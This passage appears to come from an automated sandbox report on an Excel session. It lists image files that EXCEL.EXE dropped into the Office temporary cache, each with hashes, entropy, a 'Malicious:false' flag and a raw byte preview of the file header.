                                                          Preview: .PNG........IHDR.......0......R......gAMA......a.....sRGB.........PLTE...8........f..f...............f..8...f.8.f.............8...f`bl.....8......8........bcnf.f8.88.fRRR......^`j........................<z...................f.8....................................GHH8f.sv|..._`ldfommp88.orx......kmugjr...y|.LLM.........|}........f8........DEF.........fgj........qquhio.......88......yy{.......uux...xy....bbk.......8f....ge.f........................f...ff.......PPO...............ff.x......wcRVf.....V.4f8..f77.......88c..h......uw.k7..........["&.........@(.@...8...[=..Vhd....<H>...f.8ff.p%......T..w..8..8....`...S..)u.kahd..b..f8g8...Q.......|....888..f......5|.7e.]......99Pl.......coqp.._ny....h1....1.......VWZ....6'..*$#...6..g)@........f.8....v>..1.........pE.E%GKB........fe...E.tPV...K..... .IDATx....U.6.....@......2j...:3(J.>.". .iN.......Ma.b.Wc5##oZ.FKJ....+.&.`}.....o.{....Zk........c.....>........w\v..~t.;v&.....!t......=.1.
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\119EB898.png
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:PNG image data, 768 x 560, 8-bit colormap, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):98310
                                                          Entropy (8bit):7.9703722926597
                                                          Encrypted:false
                                                          SSDEEP:1536:Zx21e23rYd3AaoeAVGm6JwgkxIbnHh+1ubK44GmWu/jeQl/4HYplS:DH2b6geAL6WgcITHh9u44wuieQYG
                                                          MD5:326233AB0E13BA251EA8A561C83E64C4
                                                          SHA1:11C7709F09142BB67F316262E42EDA81D73C4CCD
                                                          SHA-256:AC69908FB64F897EE358F4D76972E2F5B7BF8B4B6E38397BFF4134ACBEB7F0A6
                                                          SHA-512:BB7637332D8B6E8A268E24C19C84573B90885C81E50E021A2DF994451046FCDF537E96D1B8D26B8A7272489CD141784BCB799375D9C17EFD302202EC904032B7
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview: .PNG........IHDR.......0......R......gAMA......a.....sRGB.........PLTE...8........f..f...............f..8...f.8.f.............8...f`bl.....8......8........bcnf.f8.88.fRRR......^`j........................<z...................f.8....................................GHH8f.sv|..._`ldfommp88.orx......kmugjr...y|.LLM.........|}........f8........DEF.........fgj........qquhio.......88......yy{.......uux...xy....bbk.......8f....ge.f........................f...ff.......PPO...............ff.x......wcRVf.....V.4f8..f77.......88c..h......uw.k7..........["&.........@(.@...8...[=..Vhd....<H>...f.8ff.p%......T..w..8..8....`...S..)u.kahd..b..f8g8...Q.......|....888..f......5|.7e.]......99Pl.......coqp.._ny....h1....1.......VWZ....6'..*$#...6..g)@........f.8....v>..1.........pE.E%GKB........fe...E.tPV...K..... .IDATx....U.6.....@......2j...:3(J.>.". .iN.......Ma.b.Wc5##oZ.FKJ....+.&.`}.....o.{....Zk........c.....>........w\v..~t.;v&.....!t......=.1.
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1741232F.png
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):79394
                                                          Entropy (8bit):7.864111100215953
                                                          Encrypted:false
                                                          SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                                          MD5:16925690E9B366EA60B610F517789AF1
                                                          SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                                          SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                                          SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                                          Malicious:false
                                                          Reputation:moderate, very likely benign file
                                                          Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2973EFB9.png
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):6815
                                                          Entropy (8bit):7.871668067811304
                                                          Encrypted:false
                                                          SSDEEP:96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
                                                          MD5:E2267BEF7933F02C009EAEFC464EB83D
                                                          SHA1:ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
                                                          SHA-256:BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
                                                          SHA-512:AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
                                                          Malicious:false
                                                          Reputation:moderate, very likely benign file
                                                          Preview: .PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...|.RiNY.+.b...E.W.8^..o....;'..\.}........|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4F5A1AF7.png
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):51166
                                                          Entropy (8bit):7.767050944061069
                                                          Encrypted:false
                                                          SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                                                          MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                                                          SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                                                          SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                                                          SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                                                          Malicious:false
                                                          Reputation:moderate, very likely benign file
                                                          Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\55401A7A.jpeg
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 440x248, frames 3
                                                          Category:dropped
                                                          Size (bytes):20768
                                                          Entropy (8bit):7.686882804050949
                                                          Encrypted:false
                                                          SSDEEP:384:aGUhYaAJ/l6gEhS9DR+x000vHo2V9Utm3WzbO5Prt3clF3PVTSUHXSJpal5HcYcJ:PUhYa4KE99q000vIG6zboh3sBPVm0Ch
                                                          MD5:A16109E2F019BA636968768623F79C9F
                                                          SHA1:C3C0D03F4EA0443E6E12A60A7C8BF661FEBAD552
                                                          SHA-256:590591AD69D615D5434E71F51254D158ED37AECA921AD624B213E87B61C93EC1
                                                          SHA-512:763A0F5CB9DAD3C6DF5584984B84D8AA3361BD695E93B374FE068C816336D4211BB17AD9B1D005D318C60E7850B32BF07CD82C685B4CBCB89CD1C314DFE7CFF5
                                                          Malicious:false
                                                          Preview: ......JFIF.............C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...?..LJp...j.J..K.s.s...."..`m%....g.TzC/.M.?......c..O...B..4.......K.!...|....i.Q.'..O..}h..rD9c.o....?*<....i.S......H.,{....y..G....?*v...z.....b.....<.R.!lq.N.#...wX....1.I...E..H[.S...K..y....9"...Jm......M.p.Z$>..K.}h...P$..&1.R.).K.}h..r.9b'...y).K.}h..r.\...Oz<.....o_Z9b..).`E..:.....g.Om.f.2..A...C...E...p....`-c...*9b.....J{.._Z7.....X...J
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5773E24A.png
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):51166
                                                          Entropy (8bit):7.767050944061069
                                                          Encrypted:false
                                                          SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                                                          MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                                                          SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                                                          SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                                                          SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                                                          Malicious:false
                                                          Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\59667E41.jpeg
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                                          Category:dropped
                                                          Size (bytes):8815
                                                          Entropy (8bit):7.944898651451431
                                                          Encrypted:false
                                                          SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                                          MD5:F06432656347B7042C803FE58F4043E1
                                                          SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                                          SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                                          SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                                          Malicious:false
                                                          Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6F68BF36.jpeg
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 364x117, frames 3
                                                          Category:dropped
                                                          Size (bytes):27803
                                                          Entropy (8bit):7.950263564991063
                                                          Encrypted:false
                                                          SSDEEP:768:+rvE+ZQv/rZENomMQux8R6fL66j6NBPeuP:+rMYcyahXfLqWi
                                                          MD5:A97476A856CDA477354DF7FC5ADC349F
                                                          SHA1:706E5BCA0EA470410E1F54774D45818842AC3932
                                                          SHA-256:2E889F06AB8ED961C83C64FE17EBBFFB5C4588058A70FA368337EAA0F25679B6
                                                          SHA-512:682FC457F033A36C21381506D33DED784957DE5FF4CCABAA8C4E15ED7C68F504AF1518059C6BA3BD89C1E99022D49BDEB1643E33E97C0483FE7F9A24F2DDC5DA
                                                          Malicious:false
                                                          Preview: ......JFIF.............C....................................................................C.......................................................................u.l.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......g.x.y5....%...YB....G &...H'...@$..<......R_.i....I.m...^I3B..d4{...r@\.Fz.....i.u...h.Z.x,.f....Ul..V2....pG..8?..x;.W.U.Y..J..v.q.$.%.!.D.C!.A+.QJ.`....%...K..z......y.2...2m...".:..o.....Z.a.T.k.....z..m......,.F..D.*...s...@.N1uO.iI...).I-..+q.|...1egH_..l_-X.9......<=.Gw..i....k.&.k...m$t...4.Te..B..$.. .......&H...d...<6.\.<R......_.Lv.r...2x....
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\74B7F433.jpeg
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 364x117, frames 3
                                                          Category:dropped
                                                          Size (bytes):27803
                                                          Entropy (8bit):7.950263564991063
                                                          Encrypted:false
                                                          SSDEEP:768:+rvE+ZQv/rZENomMQux8R6fL66j6NBPeuP:+rMYcyahXfLqWi
                                                          MD5:A97476A856CDA477354DF7FC5ADC349F
                                                          SHA1:706E5BCA0EA470410E1F54774D45818842AC3932
                                                          SHA-256:2E889F06AB8ED961C83C64FE17EBBFFB5C4588058A70FA368337EAA0F25679B6
                                                          SHA-512:682FC457F033A36C21381506D33DED784957DE5FF4CCABAA8C4E15ED7C68F504AF1518059C6BA3BD89C1E99022D49BDEB1643E33E97C0483FE7F9A24F2DDC5DA
                                                          Malicious:false
                                                          Preview: ......JFIF.............C....................................................................C.......................................................................u.l.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......g.x.y5....%...YB....G &...H'...@$..<......R_.i....I.m...^I3B..d4{...r@\.Fz.....i.u...h.Z.x,.f....Ul..V2....pG..8?..x;.W.U.Y..J..v.q.$.%.!.D.C!.A+.QJ.`....%...K..z......y.2...2m...".:..o.....Z.a.T.k.....z..m......,.F..D.*...s...@.N1uO.iI...).I-..+q.|...1egH_..l_-X.9......<=.Gw..i....k.&.k...m$t...4.Te..B..$.. .......&H...d...<6.\.<R......_.Lv.r...2x....
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\77272925.jpeg
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 297x206, frames 3
                                                          Category:dropped
                                                          Size (bytes):17045
                                                          Entropy (8bit):7.887053199978643
                                                          Encrypted:false
                                                          SSDEEP:384:aBmP9i5b2ZgFZqcuyAyUWAULuPMUKOhPz9z+/yWl0:Qrb2lctUWAIuPMU9EBC
                                                          MD5:A750B799988704B96DA4742B3584D86B
                                                          SHA1:F3E11F5A9D8CF802F672B990776552F5503ED230
                                                          SHA-256:258BF1909B6C43D916CFA90FA63BDE0C49B8C0B3D79FD0E806E347282C5D4BD4
                                                          SHA-512:46953438C50E8655794D0E3A345D7F01B2D4049F706CC79FD3BCEE66F0643B6D341CDF8F3CABD4A2A960D7BF6669F71A7069F3ABA3662994BE2798935976366F
                                                          Malicious:false
                                                          Preview: ......JFIF.............C....................................................................C.........................................................................).."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..?.].J...3..F..Ai..:C..iZ...<....*...1..mzj.._.UB...@..x.............?.......J5z.&Y.....>..a.......isJ7m..._.`.?.0.....;.....`.?.0.....;....+.......^...>!h:.....6.n...........>`9 W@..?,|...S.4.:....Dx..0g....|g........G.0g....|g........^......z..-.#w..4.i.....?..Y?`...#F.....`A..w....J.._.....x.`...L....z....t=,....k...v.f.T...#.d..,...#.j.....y..kO....gi.XK.6..
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7B6BD21E.png
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:PNG image data, 294 x 262, 8-bit/color RGBA, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):20455
                                                          Entropy (8bit):7.971919017844605
                                                          Encrypted:false
                                                          SSDEEP:384:brrClKSmZ1oI21dlIsZyc++ZeZhJV5nmVOpheJG3u8ItmJIJ:rClKSmZ1oIFcheZhJV5nrS+urmSJ
                                                          MD5:4BE445245B4530E9136AA45ECC8D18FB
                                                          SHA1:83810AE3E998B2EDD2FCB72A19E558D7D8E334B4
                                                          SHA-256:5521F2BF794D82C2C2638841118176A4D1924F049A1F545E1C4E85F375021783
                                                          SHA-512:E836B244C884854650388635289C62C490A6DC8585CD7DAAC649D9AB5339CD9A5C419DC7ED4778B6AF77904F3BAA976DBC447F8EE503DEC45DC293FFB23E5B20
                                                          Malicious:false
                                                          Preview: .PNG........IHDR...&..........h8.....pHYs..........(J... .IDATx..w.]U..?k.....K.....HHB .`.B.......{.^.\.~.+...H....J..Z*.L2}..){.....9s..A....<O......Z..[m/.9s4....E.#.....`8..Ig|G.X..wo6........!z...!L...R.....M......F)...CJ.K.|=/.R.8.RJ...Y....#.....`0.S.!..bl..g.y.g.y....e..J.SZ.R..L&.....,.g...e.`0.....S^^.i.2e...z+.......8..).TJ).,X...q..!.i.......5Zkf..-[......c.H&....3w...E}.......%.:SJ.0w.\.{.1.....\IJO.Hux..a.....##J...$SW....8.p8....<&.5.eu.(.........'.....q.%..K.....n...d.%..p.x7}yWa2.....F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\871C60E8.jpeg
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                                          Category:dropped
                                                          Size (bytes):14198
                                                          Entropy (8bit):7.916688725116637
                                                          Encrypted:false
                                                          SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                                          MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                                          SHA1:72CA86D260330FC32246D28349C07933E427065D
                                                          SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                                          SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                                          Malicious:false
                                                          Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8FD63A2D.png
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):50311
                                                          Entropy (8bit):7.960958863022709
                                                          Encrypted:false
                                                          SSDEEP:768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
                                                          MD5:4141C7515CE64FED13BE6D2BA33299AA
                                                          SHA1:B290F533537A734B7030CE1269AC8C5398754194
                                                          SHA-256:F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
                                                          SHA-512:74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
                                                          Malicious:false
                                                          Preview: .PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9070C88C.png
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:PNG image data, 620 x 392, 8-bit/color RGB, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):27038
                                                          Entropy (8bit):7.914822491740465
                                                          Encrypted:false
                                                          SSDEEP:768:/pRWSqW77zrixHsfTsJJ5tcvvuyKuVMiwfYz8TXP:vWSzfTc2UuVQyIf
                                                          MD5:B8C84DC628D9E1ACE3B815C0E2CE05AD
                                                          SHA1:D9632A4C35667880A7A5313FB430A3961E29F4C1
                                                          SHA-256:8F4F370BE6C81F2643C00EEC2BF9B6D3AD1FF68E66392741B6DD125163A61958
                                                          SHA-512:BD5A5675106DD16DDD6545555675FB7E2C93244E1B6902E94D95418AF0831911D59BE11991719F0144ABB5E280F1A5C2F9B6340F7D21405ECA2763C81B0DE865
                                                          Malicious:false
                                                          Preview: .PNG........IHDR...l.........s.+{....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....pHYs...%...%.IR$...i.IDATx....p[w..y..................3..=.==.m9.r...s.(.....`.9....0.`.I.s y..H.l.n.m......"<........g........!...............|9...kkkj..n.#.....!))...kvvV.. .........\......G.Q.....w......22.ED........S.N......D....!.........L...."...........C,.."...*......Wr.|eeE(..|...,//..$.#......G?:~.8.....s.UX,.......j.nnn...w~....666.u....~^D....>}Z ..D..()<Y>......h4z<..'9...^O.k6.I.H..?GWW.Ilx......uttH.Rr.$.$......gg.......(..<.H....S.^}..7C.x.^z)++..t............900@.........|...f6....F..j5.Mv;y..Y-...*.b.....b....Mf.y..H.0.mv..j.....>..Y.....N.III...8s.........D.........k[YY!...#j5..f.V..n....e2hggfT:..u..t.s.J.zF<N~..V.......\....[......k.r2...J*...h.....x@.{....YRMR.`0........9..r....mmm..f{{{~~............h3....yE.y..#0...LD.N.7.......U...Y..}.g.^<...........?v...cqt...r.<...gn$.]^...S.......<+Y%.Vw.3!..f...6265.....h.X.6+...?
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A1B55BC9.jpeg
